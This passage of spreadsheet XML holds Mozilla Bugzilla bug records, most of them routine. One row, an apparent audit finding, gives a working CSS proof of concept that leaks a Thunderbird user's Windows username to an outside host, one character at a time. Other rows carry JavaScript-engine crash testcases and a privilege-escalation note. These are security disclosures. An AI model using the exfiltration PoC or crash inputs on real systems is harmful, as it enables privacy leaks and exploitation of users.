[1] http://mxr.mozilla.org/mozilla-central/source/modules/libpr0n/decoders/icon/win/nsIconChannel.cpp#538
[2] http://msdn.microsoft.com/en-us/library/dd144879%28VS.85%29.aspx -- the call is in http://mxr.mozilla.org/mozilla-central/source/modules/libpr0n/decoders/icon/win/nsIconChannel.cpp#632
[3] http://mxr.mozilla.org/mozilla-central/source/modules/libpr0n/decoders/icon/win/nsIconChannel.cpp#551
[4] http://crash-stats.mozilla.com/report/index/bp-fb1225e0-ca4a-4c4b-99ae-84df22100824
There doesn't seem to be anything obviously wrong with the API calls. This might be something hidden in the API or a codegen/PGO bug.</t>
        </is>
      </c>
      <c r="X474" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="475">
      <c r="A475" t="n">
        <v>1400141</v>
      </c>
      <c r="B475" t="inlineStr">
        <is>
          <t>2017-09-14 22:18:45 -0700</t>
        </is>
      </c>
      <c r="C475" t="inlineStr">
        <is>
          <t>Publish to balrog failures with "requests.exceptions.HTTPError: 400 Client Error: BAD REQUEST"</t>
        </is>
      </c>
      <c r="D475" t="inlineStr">
        <is>
          <t>2018-02-28 10:35:48 -0800</t>
        </is>
      </c>
      <c r="E475" t="n">
        <v>1</v>
      </c>
      <c r="F475" t="n">
        <v>1</v>
      </c>
      <c r="G475" t="n">
        <v>5</v>
      </c>
      <c r="H475" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I475" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J475" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K475" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L475" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M475" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N475" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O475" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P475" t="inlineStr"/>
      <c r="Q475" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R475" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S475" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T475" t="n">
        <v>1</v>
      </c>
      <c r="U475" t="n">
        <v>0</v>
      </c>
      <c r="V475" t="n">
        <v>34</v>
      </c>
      <c r="W475" t="inlineStr">
        <is>
          <t>Recently we've had releases whic hit several errors like this:
2017-09-15 05:10:32,060 - DEBUG - Data sent: {'data_version': 823, 'product': 'Devedition', 'hashFunction': 'sha512', 'data': '{"displayVersion": "57.0 Beta 1", "partials": [{"hashValue": "714016cf61ff8b46bd15d666fa91cdd801eed6e0935480d963a7dfa43503279ba0dbebc4ccb2b04eac27db52dc1b8a4cab74bf97a1e98677f5e94d274b1851a9", "from": "Devedition-56.0b11-build1", "filesize": 12054152}, {"hashValue": "e0bf6cabaeb0a45fb2b5246da8d92ce7638eabf48e93d250b88843f8a242a6b17a8a725ea452840ae430a53ac8ee81c8ecdfad0ff6874ac2866973d34f2249a7", "from": "Devedition-56.0b9-build1", "filesize": 12130272}], "buildID": "20170915003610", "platformVersion": "57.0", "appVersion": "57.0", "completes": [{"hashValue": "0e6259fe3f2760c86bf34c338f41ca2b9d0062f45beb52921fcaaee48905382c5195a634ff320d3969f0ba495c3869489c2368aea3e548316db0ee2de2279c18", "from": "*", "filesize": 38051763}]}', 'schema_version': 4}
2017-09-15 05:10:32,515 - DEBUG - "PUT /api/releases/Devedition-57.0b1-build1/builds/WINNT_x86-msvc/ja HTTP/1.1" 400 261
2017-09-15 05:10:32,516 - ERROR - Caught HTTPError: {"status": 400, "data": ["Failed to update row, old_data_version doesn't match current data_version"], "type": "about:blank", "detail": "Couldn't update release: Failed to update row, old_data_version doesn't match current data_version", "title": "Bad Request"}
2017-09-15 05:10:32,516 - DEBUG - REQUEST STATS: {"url": "http://balrog/api/releases/Devedition-57.0b1-build1/builds/WINNT_x86-msvc/ja", "timestamp": 1505452232.51623, "method": "PUT", "elapsed_secs": 0.4555790424346924, "status_code": 400}
2017-09-15 05:10:32,516 - DEBUG - retry: Caught exception: 
Traceback (most recent call last):
  File "/home/worker/tools/lib/python/vendor/redo-1.4.1/redo/__init__.py", line 152, in retry
    return action(*args, **kwargs)
  File "/home/worker/bin/funsize-balrog-submitter.py", line 181, in &lt;lambda&gt;
    partialInfo=partial_info, completeInfo=complete_info,
  File "/home/worker/tools/lib/python/balrog/submitter/cli.py", line 480, in run
    return ReleaseSubmitterBase.run(self, *args, schemaVersion=4, **kwargs)
  File "/home/worker/tools/lib/python/balrog/submitter/cli.py", line 437, in run
    schemaVersion=schemaVersion)
  File "/home/worker/tools/lib/python/vendor/balrogclient-0.0.4/balrogclient/api.py", line 224, in update_build
    return self.request(method='PUT', data=data)
  File "/home/worker/tools/lib/python/vendor/balrogclient-0.0.4/balrogclient/api.py", line 111, in request
    return self.do_request(url, data, method)
  File "/home/worker/tools/lib/python/vendor/balrogclient-0.0.4/balrogclient/api.py", line 130, in do_request
    req.raise_for_status()
  File "/usr/lib/python2.7/dist-packages/requests/models.py", line 825, in raise_for_status
    raise HTTPError(http_error_msg, response=self)
HTTPError: 400 Client Error: BAD REQUEST
We don't retry these errors so a human ends up rerunning them with a tc client.</t>
        </is>
      </c>
      <c r="X475" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="476">
      <c r="A476" t="n">
        <v>179238</v>
      </c>
      <c r="B476" t="inlineStr">
        <is>
          <t>2002-11-09 09:22:38 -0800</t>
        </is>
      </c>
      <c r="C476" t="inlineStr">
        <is>
          <t>Searching by commenter (longdesc) is ignored if you do "exact" or "contains"</t>
        </is>
      </c>
      <c r="D476" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:33 -0800</t>
        </is>
      </c>
      <c r="E476" t="n">
        <v>1</v>
      </c>
      <c r="F476" t="n">
        <v>1</v>
      </c>
      <c r="G476" t="n">
        <v>4</v>
      </c>
      <c r="H476" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I476" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J476" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K476" t="inlineStr">
        <is>
          <t>2.17.1</t>
        </is>
      </c>
      <c r="L476" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M476" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N476" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O476" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P476" t="inlineStr"/>
      <c r="Q476" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R476" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S476" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T476" t="n">
        <v>1</v>
      </c>
      <c r="U476" t="n">
        <v>0</v>
      </c>
      <c r="V476" t="n">
        <v>21</v>
      </c>
      <c r="W476" t="inlineStr">
        <is>
          <t>In bug 179176, Andrew Schultz says:
"searching by commenter (longdesc) seems to be ignored if you do "exact" or
"contains".  "matches regexp" seems to work."
This bug is to track that issue. ajschult@eos.ncsu.edu - just for future
reference, please file bugs for issues rather than adding comments. Thanks :-)
Gerv</t>
        </is>
      </c>
      <c r="X476" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="477">
      <c r="A477" t="n">
        <v>917167</v>
      </c>
      <c r="B477" t="inlineStr">
        <is>
          <t>2013-09-16 22:27:05 -0700</t>
        </is>
      </c>
      <c r="C477" t="inlineStr">
        <is>
          <t>[Buri][T-mobile 51612][MMS]The device cannot send MMS</t>
        </is>
      </c>
      <c r="D477" t="inlineStr">
        <is>
          <t>2013-10-16 00:23:48 -0700</t>
        </is>
      </c>
      <c r="E477" t="n">
        <v>1</v>
      </c>
      <c r="F477" t="n">
        <v>1</v>
      </c>
      <c r="G477" t="n">
        <v>6</v>
      </c>
      <c r="H477" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I477" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J477" t="inlineStr">
        <is>
          <t>RIL</t>
        </is>
      </c>
      <c r="K477" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L477" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M477" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N477" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O477" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P477" t="inlineStr"/>
      <c r="Q477" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R477" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S477" t="inlineStr">
        <is>
          <t>1.1 QE5</t>
        </is>
      </c>
      <c r="T477" t="n">
        <v>1</v>
      </c>
      <c r="U477" t="n">
        <v>0</v>
      </c>
      <c r="V477" t="n">
        <v>51</v>
      </c>
      <c r="W477" t="inlineStr">
        <is>
          <t>Mozilla build ID:20130902041201
 DEFECT DESCRIPTION:
 The device cannot send MMS. There is always a failure message "Service currently unavailable. Message will automatically be sent once service is available"
 MMS APN Settings seem correct. I cannot find a solution.
 However the device can receive MMS
 Customer Impact Statement: 
 Customer will not have this basic functionality of Smartphones. Rather poor impression of this new OS.
  REPRODUCING PROCEDURES:
  EXPECTED BEHAVIOUR:
  ASSOCIATE SPECIFICATION:
  TEST PLAN REFERENCE:
  TOOLS AND PLATFORMS USED:
  USER IMPACT:
  REPRODUCING RATE:
  For FT PR, Please list reference mobile's behavior:</t>
        </is>
      </c>
      <c r="X477" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="478">
      <c r="A478" t="n">
        <v>1355772</v>
      </c>
      <c r="B478" t="inlineStr">
        <is>
          <t>2017-04-12 03:38:41 -0700</t>
        </is>
      </c>
      <c r="C478" t="inlineStr">
        <is>
          <t>[UX] Need spec for when to automatically enable touch mode</t>
        </is>
      </c>
      <c r="D478" t="inlineStr">
        <is>
          <t>2017-05-18 01:13:40 -0700</t>
        </is>
      </c>
      <c r="E478" t="n">
        <v>1</v>
      </c>
      <c r="F478" t="n">
        <v>1</v>
      </c>
      <c r="G478" t="n">
        <v>2</v>
      </c>
      <c r="H478" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I478" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J478" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K478" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L478" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M478" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N478" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O478" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P478" t="inlineStr">
        <is>
          <t>[photon-visual][ux]</t>
        </is>
      </c>
      <c r="Q478" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R478" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S478" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T478" t="n">
        <v>1</v>
      </c>
      <c r="U478" t="n">
        <v>0</v>
      </c>
      <c r="V478" t="n">
        <v>2</v>
      </c>
      <c r="W478" t="inlineStr">
        <is>
          <t>I assume we don't want to just switch to touch mode on the fly? Should we disable touch mode again when the using the mouse? Should we prompt the user? Should we switch after a restart? What exactly are the heuristics?</t>
        </is>
      </c>
      <c r="X478" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="479">
      <c r="A479" t="n">
        <v>893684</v>
      </c>
      <c r="B479" t="inlineStr">
        <is>
          <t>2013-07-15 01:50:35 -0700</t>
        </is>
      </c>
      <c r="C479" t="inlineStr">
        <is>
          <t>OdinMonkey: Assertion failure: (size_t) (dst - src) &gt;= len, at jsutil.h</t>
        </is>
      </c>
      <c r="D479" t="inlineStr">
        <is>
          <t>2014-11-19 20:03:10 -0800</t>
        </is>
      </c>
      <c r="E479" t="n">
        <v>1</v>
      </c>
      <c r="F479" t="n">
        <v>1</v>
      </c>
      <c r="G479" t="n">
        <v>3</v>
      </c>
      <c r="H479" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I479" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J479" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K479" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L479" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M479" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N479" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O479" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P479" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main23+] fixed on trunk in bug 880538</t>
        </is>
      </c>
      <c r="Q479" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R479" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S479" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T479" t="n">
        <v>1</v>
      </c>
      <c r="U479" t="n">
        <v>0</v>
      </c>
      <c r="V479" t="n">
        <v>16</v>
      </c>
      <c r="W479" t="inlineStr">
        <is>
          <t>Created attachment 775521
stack
evaluate("\
    valueOf = (function() {\
        \"use asm\";\
        function f() {}\
        return f\
    });\
    this + ''\
", {
    fileName: '',
})
this + ''
asserts js debug shell on m-c changeset 3433a021847b without any CLI arguments intermittently (but fairly reliably) at Assertion failure: (size_t) (dst - src) &gt;= len, at jsutil.h
Locking s-s because previously-found similar assertion bug 855442 was also s-s.
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   http://hg.mozilla.org/mozilla-central/rev/b674f0e40c8e
user:        Brian Hackett
date:        Wed Jul 10 09:29:52 2013 -0600
summary:     Bug 885758 - Add ExclusiveContext for use by threads with exclusive access to their compartment, r=billm.
Brian, is bug 885758 a likely regressor?</t>
        </is>
      </c>
      <c r="X479" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="480">
      <c r="A480" t="n">
        <v>610621</v>
      </c>
      <c r="B480" t="inlineStr">
        <is>
          <t>2010-11-09 02:38:22 -0800</t>
        </is>
      </c>
      <c r="C480" t="inlineStr">
        <is>
          <t>Product dashboard not visible with IE8</t>
        </is>
      </c>
      <c r="D480" t="inlineStr">
        <is>
          <t>2010-11-22 02:12:52 -0800</t>
        </is>
      </c>
      <c r="E480" t="n">
        <v>1</v>
      </c>
      <c r="F480" t="n">
        <v>1</v>
      </c>
      <c r="G480" t="n">
        <v>4</v>
      </c>
      <c r="H480" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I480" t="inlineStr">
        <is>
          <t>Testopia</t>
        </is>
      </c>
      <c r="J480" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K480" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L480" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M480" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N480" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O480" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P480" t="inlineStr"/>
      <c r="Q480" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R480" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S480" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T480" t="n">
        <v>1</v>
      </c>
      <c r="U480" t="n">
        <v>0</v>
      </c>
      <c r="V480" t="n">
        <v>5</v>
      </c>
      <c r="W480" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)
Build Identifier: 
THe product dashboard was visible with Bugzilla 3.4.* and Testopia 2.3.*, last day I've upgraded to Bugzilla 3.6.3 and Testopia 2.4 and now I can't see the dashboard  when using IE, but works fine with Firefox or Chrome.
Web page error details given from IE:
Agente utente: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FDM; .NET4.0C; .NET4.0E; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)
Timestamp: Tue, 9 Nov 2010 10:36:21 UTC
Messaggio: Proprietà o metodo non supportati dall'oggetto
Linea: 7
Carattere: 1806
Codice: 0
URI: http://94.88.171.150/bugzilla/extensions/Testopia/extjs/adapter/ext/ext-base.js
Messaggio: Previsto oggetto
Linea: 1
Carattere: 27324
Codice: 0
URI: http://94.88.171.150/bugzilla/extensions/Testopia/testopia.all.ycomp.js
Reproducible: Always
Steps to Reproduce:
1. Login
2. Click "product Dashboard"
Actual Results:  
Product dashboard does not show
Expected Results:  
Product dashboard should appear</t>
        </is>
      </c>
      <c r="X480" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="481">
      <c r="A481" t="n">
        <v>583024</v>
      </c>
      <c r="B481" t="inlineStr">
        <is>
          <t>2010-07-29 11:21:04 -0700</t>
        </is>
      </c>
      <c r="C481" t="inlineStr">
        <is>
          <t>Errors posting question</t>
        </is>
      </c>
      <c r="D481" t="inlineStr">
        <is>
          <t>2010-07-29 16:51:39 -0700</t>
        </is>
      </c>
      <c r="E481" t="n">
        <v>1</v>
      </c>
      <c r="F481" t="n">
        <v>1</v>
      </c>
      <c r="G481" t="n">
        <v>5</v>
      </c>
      <c r="H481" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I481" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J481" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K481" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L481" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M481" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N481" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O481" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P481" t="inlineStr"/>
      <c r="Q481" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R481" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S481" t="inlineStr">
        <is>
          <t>2.2</t>
        </is>
      </c>
      <c r="T481" t="n">
        <v>1</v>
      </c>
      <c r="U481" t="n">
        <v>0</v>
      </c>
      <c r="V481" t="n">
        <v>3</v>
      </c>
      <c r="W481" t="inlineStr">
        <is>
          <t>Getting errors Asking a question. Tested with categories for both FF 3.6 and FF4 betas.
1) click AAQ
2) pick a category
3) select any subcategory
4) summarize question&gt; ask this&gt; none of these solve my problem
5) fill in question details&gt; click 'Post Question'
stacktrace data:
Traceback (most recent call last):
  File "/data/virtualenvs/kitsune/src/django/django/core/handlers/base.py", line 100, in get_response
    response = callback(request, *callback_args, **callback_kwargs)
  File "/data/www/support-stage-new.mozilla.com/kitsune/apps/questions/views.py", line 156, in new_question
    question.auto_tag()
  File "/data/www/support-stage-new.mozilla.com/kitsune/apps/questions/models.py", line 130, in auto_tag
    if version in product_details.firefox_history_development_releases or \
AttributeError: 'module' object has no attribute 'firefox_history_development_releases'</t>
        </is>
      </c>
      <c r="X481" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="482">
      <c r="A482" t="n">
        <v>1411708</v>
      </c>
      <c r="B482" t="inlineStr">
        <is>
          <t>2017-10-25 12:41:08 -0700</t>
        </is>
      </c>
      <c r="C482" t="inlineStr">
        <is>
          <t>TBE-01-012: RSS Local Path Leak via @-moz-document</t>
        </is>
      </c>
      <c r="D482" t="inlineStr">
        <is>
          <t>2020-02-16 17:13:20 -0800</t>
        </is>
      </c>
      <c r="E482" t="n">
        <v>1</v>
      </c>
      <c r="F482" t="n">
        <v>1</v>
      </c>
      <c r="G482" t="n">
        <v>3</v>
      </c>
      <c r="H482" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I482" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J482" t="inlineStr">
        <is>
          <t>Feed Reader</t>
        </is>
      </c>
      <c r="K482" t="inlineStr">
        <is>
          <t>57</t>
        </is>
      </c>
      <c r="L482" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M482" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N482" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O482" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P482" t="inlineStr">
        <is>
          <t>[fixed by bug 1035091]</t>
        </is>
      </c>
      <c r="Q482" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R482" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S482" t="inlineStr">
        <is>
          <t>Thunderbird 59.0</t>
        </is>
      </c>
      <c r="T482" t="n">
        <v>1</v>
      </c>
      <c r="U482" t="n">
        <v>0</v>
      </c>
      <c r="V482" t="n">
        <v>14</v>
      </c>
      <c r="W482" t="inlineStr">
        <is>
          <t>It was found that the local path string is leaked via crafted CSS in the Thunderbird feed feature. Gecko supports the @-moz-document CSS at-rule 2 . This at-rule allows to apply CSS depending on the string included in the URL. On Windows, if the &lt;link&gt; element, which is used for the article URL, is not specified, the feed contents are loaded in mailbox:///C:/Users/[USER_NAME]/... including computer’s user-name. The following steps show that this [USER_NAME] string can be leaked via the @-moz-document rule.
Steps to Reproduce:
• Subscribe to the https://vulnerabledoma.in/pen/tb_-moz-document_pathleak.xml
feed from one’s account.
• Open the feed’s contents.
• Confirm background requests. Observe the local path, including computer’s user- name, being sent to an external domain.
PoC:
&lt;style&gt;
@-moz-document regexp("mailbox:///C:/Users/A.*$")
{.div1{background:url(https://cure53.de/?char1=A)}}
@-moz-document regexp("mailbox:///C:/Users/B.*$")
{.div1{background:url(https://cure53.de/?char1=B)}}
@-moz-document regexp("mailbox:///C:/Users/C.*$")
{.div1{background:url(https://cure53.de/?char1=C)}}
@-moz-document regexp("mailbox:///C:/Users/D.*$")
{.div1{background:url(https://cure53.de/?char1=D)}}
[...]
&lt;/style&gt;
This PoC shows how it is first attempted to get the initial ten characters from user-name string on the local path. Assuming a victim with a user-name "Masato", the following requests will be sent:
GET https://cure53.de/?char1=M HTTP/1.1
GET https://cure53.de/?char1=a HTTP/1.1
GET https://cure53.de/?char1=s HTTP/1.1
GET https://cure53.de/?char1=a HTTP/1.1
GET https://cure53.de/?char1=t HTTP/1.1
GET https://cure53.de/?char1=o HTTP/1.1
It seems that there is a plan to remove the @-moz-document rule 3 , but this has not been implemented so far. Therefore, it is recommended to disable the use of @-moz-document rule from web content. This will help ensure that an attacker cannot abuse the power of regular expressions by combining them with seemingly harmless CSS in seeking to match and exfiltrate valuable data.</t>
        </is>
      </c>
      <c r="X482" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="483">
      <c r="A483" t="n">
        <v>418356</v>
      </c>
      <c r="B483" t="inlineStr">
        <is>
          <t>2008-02-18 23:27:10 -0800</t>
        </is>
      </c>
      <c r="C483" t="inlineStr">
        <is>
          <t>[FIX]It's unsafe to use mozIJSSubScriptLoader.loadSubScript() with non-chrome urls or chrome urls whose scheme/host part contain uppercase characters</t>
        </is>
      </c>
      <c r="D483" t="inlineStr">
        <is>
          <t>2009-02-16 17:44:06 -0800</t>
        </is>
      </c>
      <c r="E483" t="n">
        <v>1</v>
      </c>
      <c r="F483" t="n">
        <v>1</v>
      </c>
      <c r="G483" t="n">
        <v>3</v>
      </c>
      <c r="H483" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I483" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J483" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K483" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L483" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M483" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N483" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O483" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P483" t="inlineStr">
        <is>
          <t>[sg:critical]requires vulnerable addon (eg Google Toolbar)</t>
        </is>
      </c>
      <c r="Q483" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R483" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S483" t="inlineStr">
        <is>
          <t>mozilla1.9beta5</t>
        </is>
      </c>
      <c r="T483" t="n">
        <v>1</v>
      </c>
      <c r="U483" t="n">
        <v>0</v>
      </c>
      <c r="V483" t="n">
        <v>70</v>
      </c>
      <c r="W483" t="inlineStr">
        <is>
          <t>It's unsafe to use mozIJSSubScriptLoader.loadSubScript() with non-chrome urls
or chrome urls whose scheme/host part contain uppercase characters.  Scripts
that are loaded in this way do not use implicit XPCNativeWrappers when
accessing content.
  loader.loadSubScript("chrome://test/..."); // safe
  loader.loadSubScript("chrome://TEST/..."); // unsafe
  loader.loadSubScript("file://...");        // unsafe
Google Toolbar uses mozIJSSubScriptLoader.loadSubScript() with file: url, and
allows an attacker to run arbitrary code with chrome privileges.</t>
        </is>
      </c>
      <c r="X483" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="484">
      <c r="A484" t="n">
        <v>1820543</v>
      </c>
      <c r="B484" t="inlineStr">
        <is>
          <t>2023-03-06 06:53:21 -0800</t>
        </is>
      </c>
      <c r="C484" t="inlineStr">
        <is>
          <t>Assertion failure: this-&gt;flags() == 0, at gc/Cell.h:836</t>
        </is>
      </c>
      <c r="D484" t="inlineStr">
        <is>
          <t>2024-05-30 11:06:24 -0700</t>
        </is>
      </c>
      <c r="E484" t="n">
        <v>1</v>
      </c>
      <c r="F484" t="n">
        <v>1</v>
      </c>
      <c r="G484" t="n">
        <v>3</v>
      </c>
      <c r="H484" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I484" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J484" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K484" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L484" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M484" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N484" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O484" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P484" t="inlineStr">
        <is>
          <t xml:space="preserve">[adv-main112+][adv-esr102.10+] </t>
        </is>
      </c>
      <c r="Q484" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R484" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S484" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T484" t="n">
        <v>1</v>
      </c>
      <c r="U484" t="n">
        <v>0</v>
      </c>
      <c r="V484" t="n">
        <v>18</v>
      </c>
      <c r="W484" t="inlineStr">
        <is>
          <t>Steps to reproduce:
On git commit 88fa8a86e65ead2abe32044bab7ca6c10895c738 the attached sample triggers an assertion violation in the GC. There seems to be an OOM condition involved; precautiously tagging s-s.
Bisecting the issue points to commit 8d993476b0fca3d388d139a207d8fe838aeb2187 related to bug 1749298.
```
const v1 = ("DEB1").startsWith("DEB1");
function f2(a3, a4, a5, a6) {
    return ({"constructor":this,"b":a3,"__proto__":this}).newGlobal(f2);
}
f2.newCompartment = v1; 
with (f2()) {
    function f11(a12, a13) {
        return "DEB1";
    }   
    const v15 = new FinalizationRegistry(f11);
    v15.register(f2);
}
this.reportLargeAllocationFailure();
gc()
```
```
#0  0x0000555556de20ca in JSObject::zoneFromAnyThread (this=&lt;optimized out&gt;)
    at js/src/vm/JSObject.h:287
#1  0x00005555579cca4e in js::MovableCellHasher&lt;JSObject*&gt;::match (k=@0x7ffff4cdb8a0: 0x1620d9683040,
    l=@0x7fffffffcf58: 0x1620d96490b0) at js/src/gc/Barrier.cpp:120
#2  0x00005555575d5407 in js::MovableCellHasher&lt;js::HeapPtr&lt;JSObject*&gt; &gt;::match (k=...,
